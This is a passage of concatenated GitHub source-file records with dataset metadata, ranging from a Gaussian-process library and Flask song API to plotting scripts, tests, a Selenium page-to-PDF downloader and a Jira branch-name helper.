This will have the same shape as ``y``.\n\n Raises:\n ValueError: For mismatched dimensions.\n\n \"\"\"\n if kernel is None:\n kernel = self.kernel\n\n if t is not None:\n t = np.atleast_1d(t)\n if check_sorted and np.any(np.diff(t) < 0.0):\n raise ValueError(\"the input coordinates must be sorted\")\n if check_sorted and len(t.shape) > 1:\n raise ValueError(\"dimension mismatch\")\n\n A = np.empty(0) if A is None else A\n U = np.empty((0, 0)) if U is None else U\n V = np.empty((0, 0)) if V is None else V\n else:\n if not self.computed:\n raise RuntimeError(\"you must call 'compute' first\")\n t = self._t\n A = self._A\n U = self._U\n V = self._V\n\n (\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n ) = kernel.coefficients\n\n return self.solver.dot(\n kernel.jitter,\n alpha_real,\n beta_real,\n alpha_complex_real,\n alpha_complex_imag,\n beta_complex_real,\n beta_complex_imag,\n A,\n U,\n V,\n t,\n np.ascontiguousarray(y, dtype=float),\n )\n\n def predict(self, y, t=None, return_cov=True, return_var=False):\n \"\"\"\n Compute the conditional predictive distribution of the model\n\n You must call :func:`GP.compute` before this method.\n\n Args:\n y (array[n]): The observations at coordinates ``x`` from\n :func:`GP.compute`.\n t (Optional[array[ntest]]): The independent coordinates where the\n prediction should be made. If this is omitted the coordinates\n will be assumed to be ``x`` from :func:`GP.compute` and an\n efficient method will be used to compute the prediction.\n return_cov (Optional[bool]): If ``True``, the full covariance\n matrix is computed and returned. Otherwise, only the mean\n prediction is computed. (default: ``True``)\n return_var (Optional[bool]): If ``True``, only return the diagonal\n of the predictive covariance; this will be faster to compute\n than the full covariance matrix. This overrides ``return_cov``\n so, if both are set to ``True``, only the diagonal is computed.\n (default: ``False``)\n\n Returns:\n ``mu``, ``(mu, cov)``, or ``(mu, var)`` depending on the values of\n ``return_cov`` and ``return_var``. 
These output values are:\n            (a) **mu** ``(ntest,)``: mean of the predictive distribution,\n            (b) **cov** ``(ntest, ntest)``: the predictive covariance matrix,\n            and\n            (c) **var** ``(ntest,)``: the diagonal elements of ``cov``.\n\n        Raises:\n            ValueError: For mismatched dimensions.\n\n        \"\"\"\n        y = self._process_input(y)\n        if len(y.shape) > 1:\n            raise ValueError(\"dimension mismatch\")\n\n        if t is None:\n            xs = self._t\n        else:\n            xs = np.ascontiguousarray(t, dtype=float)\n            if len(xs.shape) > 1:\n                raise ValueError(\"dimension mismatch\")\n\n        # Make sure that the model is computed\n        self._recompute()\n\n        # Compute the predictive mean.\n        resid = y - self.mean.get_value(self._t)\n\n        if t is None:\n            alpha = self.solver.solve(resid).flatten()\n            alpha = resid - (self._yerr ** 2 + self.kernel.jitter) * alpha\n        elif not len(self._A):\n            alpha = self.solver.predict(resid, xs)\n        else:\n            # 'alpha' was previously used here before assignment (NameError);\n            # compute K(xs, t) . K^-1 . resid explicitly instead\n            Kxs = self.get_matrix(xs, self._t)\n            alpha = np.dot(Kxs, self.apply_inverse(resid)).flatten()\n\n        mu = self.mean.get_value(xs) + alpha\n        if not (return_var or return_cov):\n            return mu\n\n        # Predictive variance.\n        Kxs = self.get_matrix(xs, self._t)\n        KxsT = np.ascontiguousarray(Kxs.T, dtype=np.float64)\n        if return_var:\n            var = -np.sum(KxsT * self.apply_inverse(KxsT), axis=0)\n            var += self.kernel.get_value(0.0)\n            return mu, var\n\n        # Predictive covariance\n        cov = self.kernel.get_value(xs[:, None] - xs[None, :])\n        cov -= np.dot(Kxs, self.apply_inverse(KxsT))\n        return mu, cov\n\n    def get_matrix(\n        self, x1=None, x2=None, include_diagonal=None, include_general=None\n    ):\n        \"\"\"\n        Get the covariance matrix at given independent coordinates\n\n        Args:\n            x1 (Optional[array[n1]]): The first set of independent coordinates.\n                If this is omitted, ``x1`` will be assumed to be equal to ``x``\n                from a previous call to :func:`GP.compute`.\n            x2 (Optional[array[n2]]): The second set of independent\n                coordinates. 
If this is omitted, ``x2`` will be assumed to be\n ``x1``.\n include_diagonal (Optional[bool]): Should the white noise and\n ``yerr`` terms be included on the diagonal?\n (default: ``False``)\n\n \"\"\"\n if x1 is None and x2 is None:\n if self._t is None or not self.computed:\n raise RuntimeError(\"you must call 'compute' first\")\n K = self.kernel.get_value(self._t[:, None] - self._t[None, :])\n if include_diagonal is None or include_diagonal:\n K[np.diag_indices_from(K)] += (\n self._yerr ** 2 + self.kernel.jitter\n )\n if (include_general is None or include_general) and len(self._A):\n K[np.diag_indices_from(K)] += self._A\n K += np.tril(np.dot(self._U.T, self._V), -1)\n K += np.triu(np.dot(self._V.T, self._U), 1)\n return K\n\n incl = False\n x1 = np.ascontiguousarray(x1, dtype=float)\n if x2 is None:\n x2 = x1\n incl = include_diagonal is not None and include_diagonal\n K = self.kernel.get_value(x1[:, None] - x2[None, :])\n if incl:\n K[np.diag_indices_from(K)] += self.kernel.jitter\n return K\n\n def sample(self, size=None):\n \"\"\"\n Sample from the prior distribution over datasets\n\n Args:\n size (Optional[int]): The number of samples to draw.\n\n Returns:\n array[n] or array[size, n]: The samples from the prior\n distribution over datasets.\n\n \"\"\"\n self._recompute()\n if size is None:\n n = np.random.randn(len(self._t))\n else:\n n = np.random.randn(len(self._t), size)\n n = self.solver.dot_L(n)\n if size is None:\n return self.mean.get_value(self._t) + n[:, 0]\n return self.mean.get_value(self._t)[None, :] + n.T\n\n def sample_conditional(self, y, t=None, size=None, regularize=None):\n \"\"\"\n Sample from the conditional (predictive) distribution\n\n Note: this method scales as ``O(M^3)`` for large ``M``, where\n ``M == len(t)``.\n\n Args:\n y (array[n]): The observations at coordinates ``x`` from\n :func:`GP.compute`.\n t (Optional[array[ntest]]): The independent coordinates where the\n prediction should be made. If this is omitted the coordinates\n will be assumed to be ``x`` from :func:`GP.compute` and an\n efficient method will be used to compute the prediction.\n size (Optional[int]): The number of samples to draw.\n regularize (Optional[float]): For poorly conditioned systems, you\n can provide a small number here to regularize the predictive\n covariance. 
This number will be added to the diagonal.\n\n Returns:\n array[n] or array[size, n]: The samples from the conditional\n distribution over datasets.\n\n \"\"\"\n mu, cov = self.predict(y, t, return_cov=True)\n if regularize is not None:\n cov[np.diag_indices_from(cov)] += regularize\n return np.random.multivariate_normal(mu, cov, size=size)\n","repo_name":"dfm/celerite","sub_path":"celerite/celerite.py","file_name":"celerite.py","file_ext":"py","file_size_in_byte":19496,"program_lang":"python","lang":"en","doc_type":"code","stars":177,"dataset":"github-code","pt":"48"} +{"seq_id":"37465589418","text":"from unittest import TestCase as TC\nimport tempfile\nimport os\nimport shutil\n\nfrom structure_and_landscapes.organism.integer.organism \\\n import Organism as int_organism\nfrom structure_and_landscapes.population.population import Population\n\nimport run\nimport persistence\n\n\nclass TestRun(TC):\n def setUp(self):\n \"\"\"\n Generates a temp file path.\n \"\"\"\n temp_dir = tempfile.mkdtemp()\n filename = \"test.shelf\"\n filepath = os.path.join(temp_dir, filename)\n self.temp_file = filepath\n org_list = [int_organism(i) for i in range(1, 11)]\n self.init_pop = Population(org_list)\n\n def tearDown(self):\n \"\"\"\n Closes temp file.\n \"\"\"\n temp_dir = os.path.dirname(self.temp_file)\n shutil.rmtree(temp_dir)\n\n def test_run_simple(self):\n final_population = None\n other_data = \"hi\"\n r = run.Run(self.init_pop, final_population, {},\n self.temp_file, other_data)\n with persistence.get_shelf(self.temp_file) as shelf:\n r_saved = shelf.values()[0]\n self.assertEquals(r_saved.final_population, None)\n self.assertEquals(r_saved.other_data, \"hi\")\n\n def test_run_population(self):\n run.run_population(self.init_pop, 5)\n\n def test_process_initial_org(self):\n rna = {'Organism Type': 'RNA'}\n bitstring = {'Organism Type': 'Bitstring', 'Length of Org': '5'}\n nk = {\n 'Organism Type': 'NK Model',\n 'Length of Org': '5',\n 'K-total': '3'}\n nk_genes = {\n 'Organism Type': 'NK Model',\n 'Length of Org': '6',\n 'Length of Gene': '2',\n 'K-total': '3',\n 'Number of Genes': '3',\n 'K-intra': 1}\n run.process_initial_org(rna)\n run.process_initial_org(bitstring)\n run.process_initial_org(nk)\n run.process_initial_org(nk_genes)\n\n with self.assertRaises(run.OrgException):\n run.process_initial_org({'Organism Type': 'Wrong'})\n\n def test_process_initial_population(self):\n single_pop = {\n 'Organism Type': 'Bitstring',\n 'Mutation Rate': '0.01',\n 'Length of Org': '5',\n 'Orgs per Population': '10'}\n meta_pops = {\n 'Number of Populations': '2',\n 'Migration Rate': '0.33',\n 'Proportion of Population Migrated': '1.0'}\n structured_pops = {\n 'Number of Subpopulations in Width': '3',\n 'Number of Subpopulations in Height': '4',\n 'Migration Type': 'Local'}\n meta_pops.update(single_pop)\n structured_pops.update(meta_pops)\n run.process_initial_population(single_pop)\n run.process_initial_population(meta_pops)\n run.process_initial_population(structured_pops)\n\n def test_process_and_run(self):\n settings = {\n 'Organism Type': 'Bitstring',\n 'Mutation Rate': '0.01',\n 'Length of Org': '5',\n 'Number of Populations': '1',\n 'Orgs per Population': '10',\n 'Number of Generations': '2',\n 'Output File Path': self.temp_file}\n 
run.process_and_run(settings)\n","repo_name":"jaredc-s/structure_and_landscapes","sub_path":"run_management/test_run.py","file_name":"test_run.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"17524737846","text":"from flask import Flask, request\nfrom flask.json import jsonify\nfrom flask_cors import CORS\n\nfrom gestor import Gestor\nfrom xml.etree import ElementTree as ET\n\napp = Flask(__name__)\napp.config[\"DEBUG\"]=True\n\nCORS(app)\n#python manage.py runserver\ngestor=Gestor()\nidcancion=''\n@app.route('/')\ndef home():\n    return \"TODO VA BIEN\"\n\n@app.route('/agregarCancion',methods=['POST'])\ndef agregarCancion():\n    json=request.get_json()\n    gestor.agregar_cancion(json['nombre'],json['artista'],json['genero'],json['anio'])\n    return jsonify({'ok':True,'message':'Cancion añadida con exito'}),200\n\n@app.route('/agregarCanciones',methods=['POST'])\ndef agregarCanciones():\n    xml=request.data.decode('utf-8')\n    raiz=ET.XML(xml)\n    for elemento in raiz:\n        if elemento.tag == 'playlistClientes':\n            for subelemento in elemento:\n                if subelemento.tag == 'playlist': \n                    idplay=subelemento.get('id')\n                    for sub in subelemento:\n                        if sub.tag == 'nitCliente':\n                            nit =sub.text\n                        elif sub.tag == 'vinyl':\n                            vinyl = sub.text\n                        elif sub.tag == 'compacto':\n                            compacto = sub.text\n                        elif sub.tag == 'categoria':\n                            categoria = sub.text\n                        elif sub.tag == 'canciones':\n                            for sub1 in sub:\n                                if sub1.tag=='cancion':\n                                    global idcancion\n                                    idcancion=sub1.get('id')\n                                    for sub2 in sub1:\n                                        if sub2.tag=='nombre':\n                                            nombre=sub2.text\n                                        elif sub2.tag=='anio':\n                                            anio = sub2.text\n                                        elif sub2.tag=='artista':\n                                            artista = sub2.text\n                                        elif sub2.tag=='genero':\n                                            genero = sub2.text\n                                    # argument order aligned with the /agregarCancion endpoint above\n                                    gestor.agregar_cancion(nombre,artista,genero,anio)\n    return jsonify({'ok':True,'message':'Canciones cargadas con exito'}),200\n\n@app.route('/canciones',methods=['GET'])\ndef get_canciones():\n    c=gestor.obtener_canciones()\n    return jsonify(c),200\n\n@app.route('/ayuda')\ndef ayuda():\n    return \"aca aparece mi nombre\"\n\n@app.route('/eliminar', methods=['DELETE'])\ndef eliminar():\n    xml_file = request.files['xml_file']\n    song_id = request.form['song_id']\n\n    # Parse the playlist XML file\n    tree = ET.parse(xml_file)\n    root = tree.getroot()\n\n    # Find the song with the specified ID\n    song = None\n    for element in root.iter():\n        if element.tag == 'cancion' and element.attrib['id'] == song_id:\n            song = element\n            break\n\n    if song is not None:\n        # Remove the song from the XML tree\n        root.remove(song)\n\n        # Save the playlist XML file\n        tree.write(xml_file)\n        return 'Canción eliminada'\n    \n\nif __name__ ==\"__main__\":\n    app.run(debug=True)","repo_name":"Franciscoj04/IPC2_Proyecto2_202006716","sub_path":"Backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74781472465","text":"\"\"\"\nThe main file for this project. Consumes the raw data and produces an output file\ncalled \"summarized_data.csv\" containing the combined labels for the \n*first 10 columns only*\n\"\"\"\nimport pandas as pd\n\nID_COL = ['Input.attr_id']\nADJ_COLS = ['Input.adj_' + str(i) for i in range(1, 11)]\nANS_COLS = ['Answer.adj_' + str(i) for i in range(1, 11)]\n\ndef summarize_labels_baseline(data):\n    \"\"\"\n    Baseline approach. 
Predicts the label by plurality vote of all the labelers.\n \"\"\"\n cols = ID_COL + ADJ_COLS + ANS_COLS\n answers = [ # Group all of the entries that have a particular q/a combo\n data[cols].groupby(ID_COL + [ADJ_COLS[i]])[ANS_COLS[i]]\n .apply(list)\n .reset_index()\n # Rename so that we have consistent naming for each answer\n .rename(index=str, columns={'Input.attr_id': 'attr_id',\n ADJ_COLS[i]: 'adj', \n ANS_COLS[i]: 'label'})\n for i in range(len(ADJ_COLS))\n ]\n # Comine all of the answer-groupings into a single dataframe\n # Result is a dataframe where each row is a question-adjective pair, \n # and there's a column called 'label' that right now contains a list of \n # all of the labelers answers\n answers = pd.concat(answers, ignore_index=True)\n # We want to produce a single value for label. Say that the label is True\n # if at least half of labelers think it's true.\n answers['label'] = answers['label'].apply(lambda x: x.count('Yes') > len(x)/2)\n return answers\n\ndef summarize_labels(data):\n \"\"\"\n Your code goes here\n \"\"\"\n return answers\n\n\ndef main():\n\n data = pd.read_csv('raw_data.csv')\n\n # Once you have written your code, comment out this line\n result = summarize_labels_baseline(data)\n\n # Once you have written your code, uncomment this line\n #result = summarize_labels(data)\n\n # Save result\n output = pd.DataFrame(result, columns=['attr_id', 'adj', 'label'])\n output = output.sort_values(by=['attr_id', 'adj', 'label'])\n output.to_csv('summarized_data.csv', index=False)\n\nif __name__ == '__main__':\n main()","repo_name":"josh-tobin/labeling-challenge","sub_path":"summarize_labels.py","file_name":"summarize_labels.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"29938681588","text":"#-*- coding=utf-8 -*-\nimport os\nimport json\nimport sys\nimport shutil\nimport html\n\n\nfrom selenium import webdriver\n\nROOT,FILENAME=os.path.split(os.path.abspath(__file__))\nJavaScript=\"\"\nSAVEPATH=\"./\"\nUSERNAME=os.getenv(\"username\")\n\ndef LoadJs():\n global JavaScript\n if (not os.path.exists(ROOT+\"/JavaScript.js\")):\n print(\"JavaScript.js not found\")\n exit(1)\n try:\n f=open(ROOT+\"/JavaScript.js\",\"r\")\n JavaScript=f.read()\n except:\n print(\"Unknown error\")\n exit(1)\n\n\ndef checking(f):\n global USERNAME,SAVEPATH\n path=os.path.join(os.path.expanduser(\"~\"),\"Downloads\")\n if os.path.exists(path+\"/\"+f):\n print(\"download confirm\")\n print(f)\n if not os.path.exists(SAVEPATH):\n os.mkdir(SAVEPATH)\n # shutil.move(path+\"/\"+f,SAVEPATH+\"/\"+f)\n shutil.copyfile(path+\"/\"+f,SAVEPATH+\"/\"+f)\n os.remove(path+\"/\"+f)\n \ndef download(url,timeout=30):\n global JavaScript\n \n appState = { \n \"recentDestinations\": [ \n { \n \"id\": \"Save as PDF\", \n \"origin\": \"local\" \n } \n ], \n \"selectedDestinationId\": \"Save as PDF\", \n \"version\": 2\n } \n profile = {\n 'printing.print_preview_sticky_settings.appState': json.dumps(appState)\n } \n options=webdriver.ChromeOptions()\n options._binary_location=ROOT+\"/Application/chrome.exe\"\n options.add_experimental_option(\"prefs\",profile)\n options.add_argument(\"--disable-gpu\")\n options.add_argument('--allow-running-insecure-content')\n options.add_argument('--kiosk-printing')\n options.add_argument('--disable-extensions')\n #options.add_argument('--headless')\n \n chrome=webdriver.Chrome(chrome_options=options,executable_path=ROOT+\"/chromedriver.exe\")\n 
chrome.set_script_timeout(timeout)\n    print(\"Getting url...\")\n    try:\n        chrome.get(url)\n        filename=chrome.title\n    except:\n        print(\"Error on get url\")\n    try:\n        print(\"Execute JavaScript...\")\n        chrome.execute_async_script(JavaScript)\n    except:\n        print(\"Error on execute JavaScript\")\n    finally: \n        chrome.quit()\n    checking(filename+\".pdf\")\n\n\n\n    \n    \ndef main():\n    global JavaScript,SAVEPATH\n    \n    LoadJs()\n    try:\n        # print(JavaScript)\n        url=sys.argv[1]\n        SAVEPATH=sys.argv[2]\n        try:\n            timeout=int(sys.argv[3])\n        except:\n            timeout=30\n        # url=\"https://wenku.baidu.com/view/8952e6fb0c22590102029d8f.html?from=search\"\n        # SAVEPATH=\"E:/workplace\"\n        download(url,timeout)\n    except:\n        # print(\"usage: python \"+FILENAME+\" <url> <savepath> [timeout]\")\n        url=input(\"url:\")\n        timeout=int(input(\"timeout:\"))\n        download(url,timeout)\n    \n    \n    \n\nif __name__==\"__main__\":\n    main()\n\n","repo_name":"needhourger/CQtestLib","sub_path":"BDWKdownload.py","file_name":"BDWKdownload.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25763285171","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv('PEGI_Ratings_20170907.csv')\nsns.set()\n\ndf['year'] = df.release.str.slice(0, 4)\n\n# Graph by year\ngraph_df = df[['year', 'rating']].groupby('year', as_index=False).agg('mean')\n\np = sns.relplot(data = graph_df, x=\"year\", y=\"rating\", kind=\"line\", color=\"#391E29\")\np.set_ylabels(\"PEGI rating\")\np.set_xlabels(\"Year of release\")\np.set(ylim=(0, 11))\nplt.title(\"Average PEGI rating by year\")\n\nfig = plt.gcf()\nfig.set_size_inches(12, 4)\nfig.savefig('plot_year.png', dpi=100, bbox_inches='tight')\n\n# Graph by genre\ngraph_df = df[['genre', 'rating']].groupby('genre', as_index=False).agg('mean')\n\np = sns.catplot(data = graph_df, x=\"rating\", y=\"genre\", kind=\"bar\", color=\"#36554B\")\np.set_xlabels(\"PEGI rating\")\np.set_ylabels(\"Game genre\")\np.set(xlim=(0, 13))\nplt.title(\"Average PEGI rating by game genre (1999-2017)\")\n\nfig = plt.gcf()\nfig.set_size_inches(12, 5)\nfig.savefig('plot_genre.png', dpi=100, bbox_inches='tight')\n\n# Graph by platform\ngraph_df = df[['platform', 'rating']].groupby('platform', as_index=False).agg('mean')\n\np = sns.catplot(data = graph_df, x=\"rating\", y=\"platform\", kind=\"bar\", color=\"#853C43\")\np.set_xlabels(\"PEGI rating\")\np.set_ylabels(\"\")\np.set(xlim=(0, 13))\nplt.title(\"Average PEGI rating by game platform (1999-2017)\")\n\nfig = plt.gcf()\nfig.set_size_inches(12, 12)\nfig.savefig('plot_platform.png', dpi=100, bbox_inches='tight')\n\n","repo_name":"edomt/pegi","sub_path":"make_graphs.py","file_name":"make_graphs.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"34737480190","text":"import glob\nfrom netCDF4 import Dataset\nfrom csIO import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom kazrRet import *\nimport lidarSim as lidSim\nfs=sorted(glob.glob(\"anvData/cs*nc\"))\niwp1L=[]\niwp2L=[]\nfor f in fs:\n    fh=Dataset(f)\n    iwp=fh[\"iwp\"][:]\n    zw=fh[\"zw\"][:]\n    iwc=fh[\"iwc\"][:]\n    Dm=fh[\"re\"][:]*3.75e-3\n    for i,zw1 in enumerate(zw):\n        if zw1.max()<0:\n            continue\n        a=np.nonzero(zw1>-25)\n        iwc1d=np.zeros((40),float)\n        for k,zw11 in enumerate(zw1[a]):\n            ifind = lidSim.bisection2(dmST[0,:],Dm[i,a[0][k]])\n            dnw=(zw11-zST[2,ifind])/10.0\n            iwc1d[k]=iwcST[2,ifind]*10**dnw\n        iwp1L.append(iwc1d.sum())\n        
iwp2L.append(iwp[i])\n\n    break\n","repo_name":"mgrecu35/anvilRetr","sub_path":"CloudSat/readAnvData.py","file_name":"readAnvData.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13012211668","text":"#2 Compute the class average.\nscores = {\n    \"철수\" : {\n        \"수학\" : 80,\n        \"국어\" : 90,\n        \"음악\" : 100\n    },\n    \"영희\" : {\n        \"수학\" : 70,\n        \"국어\" : 60,\n        \"음악\" : 50\n    }\n}\n\n# Method 1) The way I solved it\n# total_score = 0\n# for class_name in scores:\n#     for score in scores[class_name].values():\n#         total_score += score\n#     average_score = total_score / len(scores[class_name])\n# average_class = average_score / len(scores)\n# print(average_class)\n\n# Method 2) The way the teacher solved it\n# total_score = 0\n# for person_score in scores.values():\n#     for individual_score in person_score.values():\n#         total_score += individual_score\n#         count += 1\n\n# average_score = total_score / count\n# print(average_score)\n\n# for key, value in scores.items():\n#     print(key)\n#     print(value)\n\n\n# 3 Among the cities, which was the coldest and which the hottest over the last 3 days?\ncities = {\n    \"서울\" : [-6, -10, -5],\n    \"대전\" : [-3, -5, -2],\n    \"광주\" : [0, -2, 10],\n    \"부산\" : [2, -2, 9]\n}\n#max min\n\nfor key, value in cities.items():\n    print(key)\n    print(value)\n\n# for name in cities:\n#     for temp in cities.values():\n#         temp_min = min(list(cities.values())\n#         # temp_max = max(list(cities.values())","repo_name":"hongyong3/TIL","sub_path":"python/practice/dictionary/dict_practice2.py","file_name":"dict_practice2.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42298669525","text":"# Distributed under the MIT License.\n# See LICENSE.txt for details.\n\nimport os\nimport shutil\nimport unittest\n\nfrom click.testing import CliRunner\n\nfrom spectre.Domain.Creators import Cylinder\nfrom spectre.Informer import unit_test_build_path, unit_test_src_path\nfrom spectre.Visualization.PlotPowerMonitors import (\n    find_block_or_group,\n    plot_power_monitors_command,\n)\n\n\nclass TestPlotPowerMonitors(unittest.TestCase):\n    def setUp(self):\n        self.test_dir = os.path.join(\n            unit_test_build_path(), \"Visualization\", \"PlotPowerMonitors\"\n        )\n        os.makedirs(self.test_dir, exist_ok=True)\n        self.h5_filename = os.path.join(\n            unit_test_src_path(), \"Visualization/Python\", \"VolTestData0.h5\"\n        )\n        self.plot_filename = os.path.join(self.test_dir, \"plot.pdf\")\n\n    def tearDown(self):\n        shutil.rmtree(self.test_dir)\n\n    def test_find_block_or_group(self):\n        domain = Cylinder(\n            inner_radius=1.0,\n            outer_radius=3.0,\n            lower_bound=0.0,\n            upper_bound=2.0,\n            is_periodic_in_z=False,\n            initial_refinement=1,\n            initial_number_of_grid_points=[3, 4, 5],\n            use_equiangular_map=True,\n        ).create_domain()\n        self.assertEqual(\n            find_block_or_group(0, [\"BlockyBlock\", \"InnerCube\"], domain), 1\n        )\n        self.assertEqual(\n            find_block_or_group(1, [\"BlockyBlock\", \"InnerCube\"], domain), None\n        )\n        self.assertEqual(\n            find_block_or_group(1, [\"InnerCube\", \"Wedges\"], domain), 1\n        )\n\n    def test_cli(self):\n        runner = CliRunner()\n        # Test plotting a single step\n        result = runner.invoke(\n            plot_power_monitors_command,\n            [\n                self.h5_filename,\n                \"-d\",\n                \"element_data\",\n                \"--step\",\n                \"-1\",\n                \"-b\",\n                \"Brick\",\n                \"-e\",\n                \"B*\",\n                \"-y\",\n                \"Psi\",\n                \"-o\",\n                self.plot_filename,\n            ],\n            catch_exceptions=False,\n        )\n        self.assertEqual(result.exit_code, 0, result.output)\n        # Can't easily test the plot itself, so just check that it was 
created\n self.assertTrue(os.path.exists(self.plot_filename))\n os.remove(self.plot_filename)\n\n # Test plotting over time\n result = runner.invoke(\n plot_power_monitors_command,\n [\n self.h5_filename,\n \"-d\",\n \"element_data\",\n \"-b\",\n \"Brick\",\n \"-e\",\n \"B*\",\n \"-y\",\n \"Psi\",\n \"-o\",\n self.plot_filename,\n ],\n catch_exceptions=False,\n )\n self.assertEqual(result.exit_code, 0, result.output)\n # Can't easily test the plot itself, so just check that it was created\n self.assertTrue(os.path.exists(self.plot_filename))\n os.remove(self.plot_filename)\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","repo_name":"sxs-collaboration/spectre","sub_path":"tests/Unit/Visualization/Python/Test_PlotPowerMonitors.py","file_name":"Test_PlotPowerMonitors.py","file_ext":"py","file_size_in_byte":3154,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"48"} +{"seq_id":"1015172124","text":"import time\n#\nfrom Inc.Param import TDictParam\nfrom Inc.Log import Log\nfrom Core.Device import TControl\n\n\nPkgConf = {\n \"Version\": \"1.01\",\n \"Author\": \"Vladvons\"\n}\n\nclass TControlSleep(TControl):\n def __init__(self, aParent):\n super().__init__(aParent)\n\n Pattern = {'Time': 1, 'Init': False}\n self.Param.AddDefPattern(Pattern)\n\n def DoParameter(self, aParam):\n self.Param.LoadPattern(aParam)\n\n def _Set(self, aCaller, aValue):\n #Log.PrintDbg(1, 'i', 'Alias %s' % (self.Alias))\n time.sleep(self.Param.Time)\n","repo_name":"VladVons/py-relay","sub_path":"src/Plugin/Devices/Sleep.py","file_name":"Sleep.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71764896786","text":"from src.components.data_ingesion import InitiateDataIngesion\nfrom src.components.chart_generator import InitiateChartGenerator\nfrom src.utils import data_columns, download, developer\nimport streamlit as st\nimport warnings\nwarnings.simplefilter('ignore')\n\n_, columns, reverse_columns = data_columns()\nwith st.sidebar:\n my_bar = st.radio('', options=('Home', 'Sales Trend', 'Uni variate Analysis', 'Bi variate Analysis', 'Developer'))\n\n# Dashboard\nif my_bar == 'Home':\n st.subheader(':blue[___________________________________________________]')\n st.title(':blue[Amazon Sales]')\n st.subheader(':blue[___________________________________________________]')\n st.caption('New sales data entry')\n raw_data = InitiateDataIngesion().get_data(data_from='local_raw_data')\n new_data = InitiateDataIngesion().single_data_entry(old_data=raw_data)\n tab1, tab2, tab3 = st.tabs(['Upload CSV', 'Download CSV', 'Data Viewer'])\n with tab1:\n InitiateDataIngesion().mulltiple_entry(old_data=raw_data)\n with tab2:\n download(raw_data)\n with tab3:\n st.dataframe(raw_data)\n # st.caption('Top Products')\n # InitiateChartGenerator().word_cloud()\n # InitiateChartGenerator().top_products()\n\n# Trend selection and distribution chart generator uses generate_trend_chart class\nif my_bar == 'Sales Trend':\n try:\n st.subheader(':blue[______________________________________________________]')\n st.title(':blue[Sales Trend]')\n st.subheader(':blue[______________________________________________________]')\n col1, col2, col3 = st.columns(3)\n with col1:\n trend_selection = st.radio(\n ':blue[Chart Combination]', (\n 'Monthly total', 'Yearly total', 'Yearly month wise bar chart', 'Yearly month wise line chart',\n 'Monthly Year wise'\n )\n )\n with col2:\n feature = 
st.radio(\n                ':blue[Select Parameter]', columns)\n        with col3:\n            counter = st.radio(':blue[Select Total of]', ['Total', 'Average', 'Maximum', 'Minimum'])\n\n        st.caption('Hover on image and click extend for full size')\n        chart_fig = InitiateChartGenerator().generate_trend_chart(trend_selection, feature, counter)\n    except:\n        pass\n\n# Select one of the columns and plot its distribution using the univariate_plot class\nif my_bar == 'Uni variate Analysis':\n    st.subheader(':blue[______________________________________________________]')\n    st.title(':blue[Uni variate Analysis]')\n    st.subheader(':blue[______________________________________________________]')\n    selected = st.selectbox(':blue[Select the parameter to generate data distribution plot]', columns)\n    st.caption('Hover on image and click extend for full size')\n    InitiateChartGenerator().univariate_plot(selected)\n\n# Select two columns to compare\nif my_bar == 'Bi variate Analysis':\n    st.subheader(':blue[______________________________________________________]')\n    st.title(':blue[Bi variate Analysis]')\n    st.subheader(':blue[______________________________________________________]')\n    st.subheader(':blue[Comparison of sales amounts yearly month wise: -]')\n    col1, col2 = st.columns(2)\n    with col1:\n        option1 = st.radio('Select First element', columns)\n    with col2:\n        option2 = st.radio('Select second element', reverse_columns)\n    InitiateChartGenerator().bivariate_plot(option1, option2)\n\nif my_bar == 'Developer':\n    developer()\n","repo_name":"Ranjitdev/amazon_sales","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10481120872","text":"import googletrans\nimport os\nimport requests\nimport sys\nfrom typing import Iterable, List, Optional\n\nfrom jira import JIRA, Issue, JIRAError\n\nJIRA_USER = os.environ.get(\"JIRA_USER\")\nJIRA_PASSWORD = os.environ.get(\"JIRA_PASSWORD\")\nJIRA_OPTIONS = {\"server\": os.environ.get(\"JIRA_BASE\")}\n\ntranslator = googletrans.Translator()\n\n\ndef varify_ticket_format(ticket_no):\n    if not ticket_no or ticket_no == '':\n        return False\n    tmp = ticket_no.split('-')\n    if len(tmp) != 2:\n        return False\n    project, number = tmp[0], tmp[1]\n    if project == '' or number == '' or not number.isnumeric() or \\\n        int(number) == 0 or not project.isalpha():\n        return False\n    return True\n\n\ndef branchname_maker(ticket_no, msg):\n    if not msg or msg == '':\n        raise ValueError('msg must be a non-empty string')\n    change_list = [\n        (' ', '-'),\n        ('_', '-'),\n        (':', '-'),\n        (\"'\", '\"'),\n        ('/', ''),\n        ('(', ''),\n        (')', ''),\n        ('[', ''),\n        (']', ''),\n        ('{', ''),\n        ('}', '')\n    ]\n    for change_from, change_to in change_list:\n        msg = msg.replace(change_from, change_to)\n    return (ticket_no + '-' + msg).lower()\n\n\ndef get_jira_client() -> JIRA:\n    return JIRA(basic_auth=(JIRA_USER, JIRA_PASSWORD), **JIRA_OPTIONS)\n\n\ndef get_issues(keys: 